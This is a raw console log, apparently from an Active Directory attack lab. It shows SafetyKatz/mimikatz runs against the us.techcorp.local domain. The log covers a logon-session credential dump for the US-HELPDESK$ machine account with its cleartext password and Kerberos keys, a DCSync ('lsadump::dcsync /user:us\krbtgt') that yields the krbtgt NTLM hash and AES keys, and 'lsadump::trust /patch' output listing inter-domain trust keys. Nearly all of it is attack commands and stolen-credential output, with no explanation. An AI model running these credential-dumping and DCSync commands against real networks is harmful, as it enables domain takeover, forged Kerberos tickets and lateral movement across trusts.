aes256_hmac b654a7108a6e384d0e8a57db97dc10afed802f40b419eb7688e821478ccdaf9f
rc4_hmac_nt 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_hmac_old 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_md4 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_hmac_nt_exp 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_hmac_old_exp 76c3848cc2e34ef0a8b5751f7e886b8e
Authentication Id : 0 ; 1299022 (00000000:0013d24e)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/3/2024 3:15:02 AM
SID : S-1-5-90-0-2
* Username : US-HELPDESK$
* Domain : us.techcorp.local
* Password : _P,6-6-[/Y(bUsRE7z/@/x2o&Aw/A+S.:HY4O"Um?ML"JJeEe>0^Ywi:18Q?:v^GZno&/M]tE-gIF8*8_/W``4SG]+R]#7n[dlTQ_qQ<LwB;t$1p?qCp9?j/
* Key List :
aes256_hmac 9ff8482457429da3c58f466671a80765f175b14f22ef2d2ee0e12f7db3675e39
aes128_hmac b594b6d5ec804b1cec302f778b5249d0
rc4_hmac_nt 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_hmac_old 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_md4 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_hmac_nt_exp 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_hmac_old_exp 76c3848cc2e34ef0a8b5751f7e886b8e
Authentication Id : 0 ; 1298807 (00000000:0013d177)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/3/2024 3:15:02 AM
SID : S-1-5-90-0-2
* Username : US-HELPDESK$
* Domain : us.techcorp.local
* Password : _P,6-6-[/Y(bUsRE7z/@/x2o&Aw/A+S.:HY4O"Um?ML"JJeEe>0^Ywi:18Q?:v^GZno&/M]tE-gIF8*8_/W``4SG]+R]#7n[dlTQ_qQ<LwB;t$1p?qCp9?j/
* Key List :
aes256_hmac 9ff8482457429da3c58f466671a80765f175b14f22ef2d2ee0e12f7db3675e39
aes128_hmac b594b6d5ec804b1cec302f778b5249d0
rc4_hmac_nt 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_hmac_old 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_md4 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_hmac_nt_exp 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_hmac_old_exp 76c3848cc2e34ef0a8b5751f7e886b8e
Authentication Id : 0 ; 50442 (00000000:0000c50a)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/3/2024 2:59:52 AM
SID : S-1-5-90-0-1
* Username : US-HELPDESK$
* Domain : us.techcorp.local
* Password : _P,6-6-[/Y(bUsRE7z/@/x2o&Aw/A+S.:HY4O"Um?ML"JJeEe>0^Ywi:18Q?:v^GZno&/M]tE-gIF8*8_/W``4SG]+R]#7n[dlTQ_qQ<LwB;t$1p?qCp9?j/
* Key List :
aes256_hmac 9ff8482457429da3c58f466671a80765f175b14f22ef2d2ee0e12f7db3675e39
aes128_hmac b594b6d5ec804b1cec302f778b5249d0
rc4_hmac_nt 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_hmac_old 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_md4 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_hmac_nt_exp 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_hmac_old_exp 76c3848cc2e34ef0a8b5751f7e886b8e
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : US-HELPDESK$
Domain : US
Logon Server : (null)
Logon Time : 7/3/2024 2:59:51 AM
SID : S-1-5-20
* Username : us-helpdesk$
* Domain : US.TECHCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac b654a7108a6e384d0e8a57db97dc10afed802f40b419eb7688e821478ccdaf9f
rc4_hmac_nt 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_hmac_old 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_md4 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_hmac_nt_exp 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_hmac_old_exp 76c3848cc2e34ef0a8b5751f7e886b8e
Authentication Id : 0 ; 1292050 (00000000:0013b712)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 7/3/2024 3:15:01 AM
SID : S-1-5-96-0-2
* Username : US-HELPDESK$
* Domain : us.techcorp.local
* Password : _P,6-6-[/Y(bUsRE7z/@/x2o&Aw/A+S.:HY4O"Um?ML"JJeEe>0^Ywi:18Q?:v^GZno&/M]tE-gIF8*8_/W``4SG]+R]#7n[dlTQ_qQ<LwB;t$1p?qCp9?j/
* Key List :
aes256_hmac 9ff8482457429da3c58f466671a80765f175b14f22ef2d2ee0e12f7db3675e39
aes128_hmac b594b6d5ec804b1cec302f778b5249d0
rc4_hmac_nt 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_hmac_old 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_md4 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_hmac_nt_exp 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_hmac_old_exp 76c3848cc2e34ef0a8b5751f7e886b8e
Authentication Id : 0 ; 29983 (00000000:0000751f)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 7/3/2024 2:59:50 AM
SID : S-1-5-96-0-0
* Username : US-HELPDESK$
* Domain : us.techcorp.local
* Password : _P,6-6-[/Y(bUsRE7z/@/x2o&Aw/A+S.:HY4O"Um?ML"JJeEe>0^Ywi:18Q?:v^GZno&/M]tE-gIF8*8_/W``4SG]+R]#7n[dlTQ_qQ<LwB;t$1p?qCp9?j/
* Key List :
aes256_hmac 9ff8482457429da3c58f466671a80765f175b14f22ef2d2ee0e12f7db3675e39
aes128_hmac b594b6d5ec804b1cec302f778b5249d0
rc4_hmac_nt 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_hmac_old 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_md4 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_hmac_nt_exp 76c3848cc2e34ef0a8b5751f7e886b8e
rc4_hmac_old_exp 76c3848cc2e34ef0a8b5751f7e886b8e
mimikatz(commandline) # exit
Bye!
US\KRBTGT
PS C:\\AD\\Tools> .\\SafetyKatz.exe "lsadump::dcsync /user:us\\krbtgt" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # lsadump::dcsync /user:us\\krbtgt
[DC] 'us.techcorp.local' will be the domain
[DC] 'US-DC.us.techcorp.local' will be the DC server
[DC] 'us\\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 7/5/2019 12:49:17 AM
Object Security ID : S-1-5-21-210670787-2521448726-163245708-502
Object Relative ID : 502
Credentials:
Hash NTLM: b0975ae49f441adc6b024ad238935af5
ntlm- 0: b0975ae49f441adc6b024ad238935af5
lm - 0: d765cfb668ed3b1f510b8c3861447173
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 819a7c8674e0302cbeec32f3f7b226c9
* Primary:Kerberos-Newer-Keys *
Default Salt : US.TECHCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 5e3d2096abb01469a3b0350962b0c65cedbbc611c5eac6f3ef6fc1ffa58cacd5
aes128_hmac (4096) : 1bae2a6639bb33bf720e2d50807bf2c1
des_cbc_md5 (4096) : 923158b519f7a454
* Primary:Kerberos *
Default Salt : US.TECHCORP.LOCALkrbtgt
Credentials
des_cbc_md5 : 923158b519f7a454
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
01 a1bdf6146e4b13c939093eb2d72416c9
02 cd864c0d5369adad4fc59a469a2d4d17
03 2123179b0ab5c0e37943e346ef1f9d9a
04 a1bdf6146e4b13c939093eb2d72416c9
05 cd864c0d5369adad4fc59a469a2d4d17
06 3449e5615d5a09bbc2802cefa8e4f9d4
07 a1bdf6146e4b13c939093eb2d72416c9
08 296114c8d353f7435b5c3ac112523ba4
09 296114c8d353f7435b5c3ac112523ba4
10 5d504fb94f1bcca78bd048de9dad69e4
11 142c7fde1e3cb590f54e12bbfdecfbe4
12 296114c8d353f7435b5c3ac112523ba4
13 13db8df6b262a6013f78b082a72add2c
14 142c7fde1e3cb590f54e12bbfdecfbe4
15 b024bdda9bdb86af00c3b2503c3bf620
16 b024bdda9bdb86af00c3b2503c3bf620
17 91600843c8dadc79e72a753649a05d75
18 423730024cfbbc450961f67008a128a5
19 d71f700d63fa4510477342b9dc3f3cc7
20 bad6b9122f71f8cfd7ea556374d381d9
21 52c6560f77613d0dcf460476da445d93
22 52c6560f77613d0dcf460476da445d93
23 23504d9f1325c5cf68892348f26e77d7
24 8228bd623c788b638fce1368c6b3ef44
25 8228bd623c788b638fce1368c6b3ef44
26 a2659c1d9fa797075b1fabdee926569b
27 784f5fbc5276dcc8f88bbcdfa27b65d8
28 2ac6c7c1c24262b424f85e1ab762f1d3
29 4bef285b22fd87f4868be352958dcb9e
mimikatz(commandline) # exit
Bye!
ADLID9827
Trust Keys
[us-dc]: PS C:\\Users\\Administrator\\Documents> .\\SafetyKatz.exe "lsadump::trust /patch" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # lsadump::trust /patch
Current domain: US.TECHCORP.LOCAL (US / S-1-5-21-210670787-2521448726-163245708)
Domain: TECHCORP.LOCAL (TECHCORP / S-1-5-21-2781415573-3701854478-2406986946)
[ In ] US.TECHCORP.LOCAL -> TECHCORP.LOCAL
* 8/3/2024 9:15:55 PM - CLEAR - 3f 1f 5f 58 09 ab a5 71 a9 c8 dd 9f c9 1c bd 10 12 13 ed 3f af f7 9a 73 54 12 8c 8f 32 e3 b6 22 a1 96 fc 0a 3a b0 c9 15 1c fc 03 0a 94 17 de 9b a6 03 36 0d 69 f4 b3 8c 65 8d 34 a7 39 5a da 43 db 5d 96 69 96 6a cc 13 b8 ce 87 29 73 dd 26 23 2d 68 7e 8e 93 8b 45 96 c7 ef 8e 10 36 45 32 aa cd 1a 31 56 22 97 fa c1 67 c3 2d d5 02 78 9b a0 9a 80 10 e6 7b 0a 51 52 46 61 45 f7 d6 37 91 2a d7 76 5a 7d 47 3d 34 6d 63 de 41 aa 16 f3 80 bf e9 b6 e5 ba ef e9 33 d4 d4 b8 7e b1 1f b6 e5 20 ed a0 b7 73 99 cc cb e7 a2 e6 ed 18 da 24 48 cc d2 48 44 7d b3 e4 86 55 2d d7 02 6d 31 bd 88 20 ea 29 e5 4f b0 70 ae 53 cc 22 1e 9e 6d 12 88 db 91 07 f5 08 39 ac 1f 40 b7 9a 3d 05 45 2d 52 85 5a d2 a5 ef 19 83 18 69 60 21 3d 90 e0 af 5a 6a
* aes256_hmac bda73767bb3b8c171ef5e30db8defee77d2dfa79a79c80c2546be3dada08686e
* aes128_hmac 6c0e955a50d0e07238b4adf7577d13de
* rc4_hmac_nt 13766b82c578582d8c30707931ac3205
[ Out ] TECHCORP.LOCAL -> US.TECHCORP.LOCAL
* 8/3/2024 9:04:42 PM - CLEAR - 4d 11 82 fa b8 08 92 1d e7 75 e9 38 ba 04 60 03 29 0a 8d 74 ad d1 3f 28 d0 12 90 26 c4 26 c6 4f db d8 6b 3f 17 f7 c2 25 d7 7b d4 64 e6 8d 1c db d0 9b 20 95 a4 be 7b cd eb 6c c8 63 45 5b 72 a8 3d e9 7f c4 98 e2 88 6a 91 0a e5 10 91 d8 cf 63 79 6b fa 6e d8 85 3c 4a 75 01 eb 27 e7 70 ad 24 ad 91 a7 b0 a2 d1 c5 0d 7f 9e 10 7a ae e0 f6 86 9d 7d fe e3 a1 bc 30 91 13 a2 b1 7d 68 ae 12 d0 a7 11 30 1b 27 b4 c5 da a8 3e 00 08 71 b7 19 81 a7 7c 34 99 75 b8 8b 12 78 7d 5c 1a f3 1c cf 13 a0 3b 53 f9 06 42 4d 00 fa dc 20 bf cb eb c2 1b ff 86 85 56 0e 4f d4 8d 1a c3 a8 eb ad c3 47 bd 0a 52 59 d7 e6 32 e9 ff 6a e3 b8 0b df db 23 aa c6 d4 2b 68 f0 4c 6d 27 19 ac 76 ab 55 76 c0 80 c4 57 e5 e5 9e 47 5c 46 0f 1b 8a 51 7c 6c 22 8c
* aes256_hmac 83bf3baec1d31c65d85e53e2493def63a8d880fcaab2c8216104d207bbe4af2f
* aes128_hmac c82460b6bfabaf9d777e49a068981f83
* rc4_hmac_nt 43633ee7409ac1c8d4c36cdce6d42d1c
[ In-1] US.TECHCORP.LOCAL -> TECHCORP.LOCAL
* 7/2/2024 2:23:14 AM - CLEAR - 1b 7a 9b 2f 25 70 ef cb 1a 80 8a 38 06 86 b1 8e 5d 55 99 20 d6 41 e1 8f 47 4c 61 94 0c 92 e0 35 05 0a 5b 50 8f 8c 34 89 9e dd 80 71 08 b4 d3 ec 62 2c ab 96 bd c0 9c 00 99 00 35 4a b7 c7 42 c2 5d 74 ee 15 1e 4a c1 fc 96 f9 7a fd 82 6b d2 38 41 23 27 a6 6d 3e 8c fe 9c f3 a8 c5 b4 c9 c5 d2 2d 6d 88 53 84 3a 77 9f 99 36 ce dc 9b 11 6c e9 dd ec 6e e9 91 2e 6d 30 42 0e 30 14 d6 3a 99 7b 6c 7a 2c 0f 10 6c cc 87 82 7f 96 04 09 c0 c9 72 2c fc e3 43 dc f2 22 73 cd 4b 37 d2 03 ee 1d b7 42 3d 70 c8 2d ff 4b 94 40 0f 3b 9c 45 2f 9e 23 c3 4e 08 38 62 93 3d 70 d6 1e 33 7b e4 f7 be 41 33 8b 39 70 a4 e2 ab 02 79 d4 2a 1c 33 1c 77 eb bb b6 a1 6d 29 67 4c d8 1c 62 61 b0 01 98 9a de fa 6d a0 f7 7b 81 4a 2f 51 26 7e 15 c8 b9 e0 50
* aes256_hmac 2c55b0ad2b33d441c445dfe52af1b6fc073af9e75c13b2301f1ddac10291bbe6
* aes128_hmac 80f118381c2df45328bfa6027449df3e
* rc4_hmac_nt b643e817a077f3e6952a096e169c3a90
[Out-1] TECHCORP.LOCAL -> US.TECHCORP.LOCAL
* 8/3/2024 9:04:42 PM - CLEAR - eb 5f b0 45 4b 91 2c ed ed b2 ac e4 88 69 75 40 66 d3 61 e1 83 60 55 59 c1 61 af e7 38 6f 6f 6f eb 89 e5 8b 5f ff 15 ae 1d 85 15 a1 e3 64 4f ce d5 64 b9 9d 7a 93 12 31 cb 56 13 16 9b 6a 53 de cc 42 72 1c 90 a7 bf 47 2a 58 aa b5 a4 0c 6b b8 7d 0b a1 0c 45 21 c4 d9 a5 9a 77 a5 15 fe d9 a2 8b d3 38 3f ec d1 ec f9 05 56 ab aa a4 d7 7a 11 7f 8b 01 af 21 2c 2d 7c 09 a8 f3 ec b1 8b 92 3d a8 d7 ad 84 fa 6a 25 87 af a9 03 a9 61 01 45 e1 27 e4 60 96 dd 4b d0 db 54 c0 45 e8 ef 03 e6 dc 58 c6 e1 0f fd 98 55 b8 01 42 15 54 bb c8 91 a0 6d ad fc 60 5d ff 2a 21 e2 a2 93 0a 9d da 7b 7d b8 cf 1b 38 b3 91 3b 71 e4 1a 37 4c c5 41 91 b3 d7 84 41 00 fe 12 6f fe e3 1a bc 9f 35 cf a6 33 5c ee 0b e0 e6 2f d6 0f ae 9f 98 65 04 a2 b5 54
* aes256_hmac c0ce0eeab0dcb212369a38f6a935dd29c20bc11c98f24b14e7419d0b45cad407
* aes128_hmac 276b93f90146bec6f85d9f78e6ba12ef
* rc4_hmac_nt e046fbb5f6bf7b6c1b40cd2d8265d0d3
Domain: EU.LOCAL (EU / S-1-5-21-3657428294-2017276338-1274645009)
[ In ] US.TECHCORP.LOCAL -> EU.LOCAL
* 8/3/2024 9:16:04 PM - CLEAR - db a7 c2 43 45 41 c9 17 c7 5c 27 4f 7d af 9d 87 a9 44 04 b8 68 76 10 ff 62 b7 43 4f e2 c0 c5 35 a3 44 12 33 6a f5 32 22 00 c4 c9 a7 79 13 23 57 3c 35 26 99 6a 56 57 ca 46 21 0f 84 7a 7a 9c fc 78 16 b7 0c 34 6b 7f 6e 16 b9 c8 b7 4e df 16 06 85 ac 57 49 2b 17 c8 74 b5 53 c0 da e5 00 a7 63 9b f6 16 2d a9 bd c3 fa e4 ad 79 18 f8 96 ef 42 0f 2a 21 69 00 13 a1 f1 4b 82 69 37 e9 5a dd 4a 38 28 ef bd 49 bf 01 9c 90 37 f8 68 83 4e 52 67 4e ff ce 3a 7a 9b 01 f2 2d dc 07 8f 7d 11 0d 36 d0 59 ef a3 1d c7 48 d0 4a a8 84 07 2e 32 98 2e 4f eb 73 55 e3 ee 0a 93 60 33 86 0c 17 81 fd 68 f8 b1 cb dd 54 dd a0 60 27 f5 0d c1 4c 25 b0 45 7f e4 ac 85 05 39 88 cf 89 f1 80 e7 e6 a8 0b 92 25 05 c9 79 81 7f 16 0f c2 a1 e1 e2 a1 99 ec 82
* aes256_hmac 8249f7eb9f5dff56ad607f99dfac1a81eb3729b80786919714e46876302ab9f6
* aes128_hmac b486c602ef93eda0389303e555d86206
* rc4_hmac_nt 358eebe5d44bcde30587c5b6de7f78a2
[ Out ] EU.LOCAL -> US.TECHCORP.LOCAL
* 8/3/2024 9:04:44 PM - CLEAR - 3a 74 12 06 2f 7c 6a 80 75 d0 9a ba b5 dd 32 b5 11 ed dc 83 9e 6c ff a3 ff 4a ea 83 bb 82 66 17 b0 86 4c 5c 8d 75 42 bb a5 1a 45 cf 63 75 9c 26 3b d1 a4 57 78 e3 37 67 69 58 01 6d 23 db e7 68 76 2d 05 ba b0 99 58 d8 54 a0 6a 77 9d 88 d9 d5 79 65 cd 93 82 37 1e 5d cb 83 b1 87 33 fa a8 97 96 d6 e7 b8 92 24 10 62 f8 9c 24 61 e7 fa 29 a7 86 5b e4 6d f5 c1 af c1 48 82 c8 a1 5d 20 ae c7 c1 eb a6 cd 5c a3 6f ba 3f fd 91 6e 85 6e a4 39 2a d3 3a 69 1c 25 81 ba a9 c3 e6 e4 be d8 98 11 9a d8 0d ff 97 02 b6 a3 86 03 7e 3c a2 37 3d 24 e9 fd 28 3b 9b b4 bb cb f5 19 f2 7b ff 15 f4 b3 ee 56 7c 74 c8 df 33 0c a2 38 2a 9d 6f f2 64 0c cf 79 24 20 9d f1 fb 3b 76 fa b1 81 29 2f bc 52 38 41 5f ba da df 63 02 a0 a1 56 05 63 3f 93 af
* aes256_hmac 7d494967d2a5082aa84bde7652295b1951a37d777ee83673577c30831abba124
* aes128_hmac a688680a432cc6db648b90972c5c5323
* rc4_hmac_nt f298838cf059d286c0c9aa2ddf8c2c3f
[ In-1] US.TECHCORP.LOCAL -> EU.LOCAL
* 7/2/2024 2:23:24 AM - CLEAR - f9 72 64 10 2f a8 4f cb fa 49 67 ed c0 fa a0 42 ba 2c 34 f9 9a 7f 8b e0 a8 a2 0c 88 79 e5 3b 74 3e 6d ef b1 ac 17 a3 9e 01 74 b6 61 84 19 ed a4 5b ea 63 b6 51 61 e3 47 43 3f 82 8a 8c e0 b1 93 40 1f af fd f9 a0 ff e7 c0 e6 85 8e 23 a5 a9 d6 b9 14 06 4d 68 28 b9 3b e3 f8 1c 9c 06 a2 13 5d 84 84 e1 2a db db 0e 02 18 af 26 75 31 9a 69 99 50 f1 8a aa 49 ac db 57 4c 94 e2 c9 49 53 94 b9 33 a6 f7 fd 2f f5 d8 4d fd 1d 72 fd 81 63 56 da b7 47 91 a5 20 4c ad 8f b6 0e 74 ec cf d4 aa fb fe e3 71 1d 4f 2c ad 30 fe 3c fc 4a 51 ea 26 30 9c 65 7f e8 7e a0 6a 02 ba 56 a8 c1 98 41 cf cc e0 46 d9 34 dd 76 cc b9 7c f2 d6 44 e6 39 52 79 fe 65 48 3f 2b 35 f1 41 01 1c 4e b4 68 75 6a c7 f5 2d 70 6c b8 11 46 84 61 6d 02 bd 4f 46 5d 28
* aes256_hmac b9346f46206de34ff0453613a2537a7adfb7efac9b23f5fcebd3be6e89b40e40
* aes128_hmac 279c54f45d18d622c27cdbac530f4a8c
* rc4_hmac_nt d96eb104c123ff496e1e455bd0148244
[Out-1] EU.LOCAL -> US.TECHCORP.LOCAL
* 8/3/2024 9:04:44 PM - CLEAR - 53 6f 40 b6 34 7d 12 32 e4 3b d4 7f ae a6 13 7e f4 e6 9e 94 fb 7a 02 41 a3 41 5f d2 e0 40 a1 b4 55 1d 71 5e fa 04 7c 12 62 01 a2 2a 44 cd b3 27 61 27 7e 23 c4 97 a3 b9 8d 37 1d 96 85 33 79 6b 46 22 51 f5 40 0d a2 70 ec 35 da 1c 0f f7 49 aa 1a 8f 2e 7f ec ef d4 a1 b9 0f 42 74 4b f0 4f a5 39 c5 31 5b d7 66 f9 bf 11 98 dc 7b 2b 97 30 c9 44 2a da a2 18 fe 9c c8 ee dd fc cd 66 fb 16 47 cb f4 ab b8 c6 a0 7f 65 2f d5 55 18 ef b5 19 98 48 c5 07 4f 5c 5e 33 9d 47 c2 cb e1 2d 8c 87 ec 72 d2 26 af be 27 a7 c6 b6 38 f7 80 75 1f 16 e5 b1 15 d3 6e 20 18 03 93 52 d5 25 6b a0 65 cb 05 4d 46 b4 91 91 35 ee 5e 0f fa 04 ca 77 a8 e3 b3 a2 3b 7e 2d a0 e2 79 b2 f6 07 76 e2 1f bb a9 ff 1b 84 9d d6 3b 8d 9c bb ee 5d 1b 7d d1 31 fa 1f
* aes256_hmac cf6e0066827faf9bbe43d3a0b11b0554680c5c91058f93e43da5a68003d1e5b2
* aes128_hmac 7b9221573761629ef7cba586cfecd607
* rc4_hmac_nt 147e82a078bae9756ff23d301339740f
EU-Administrator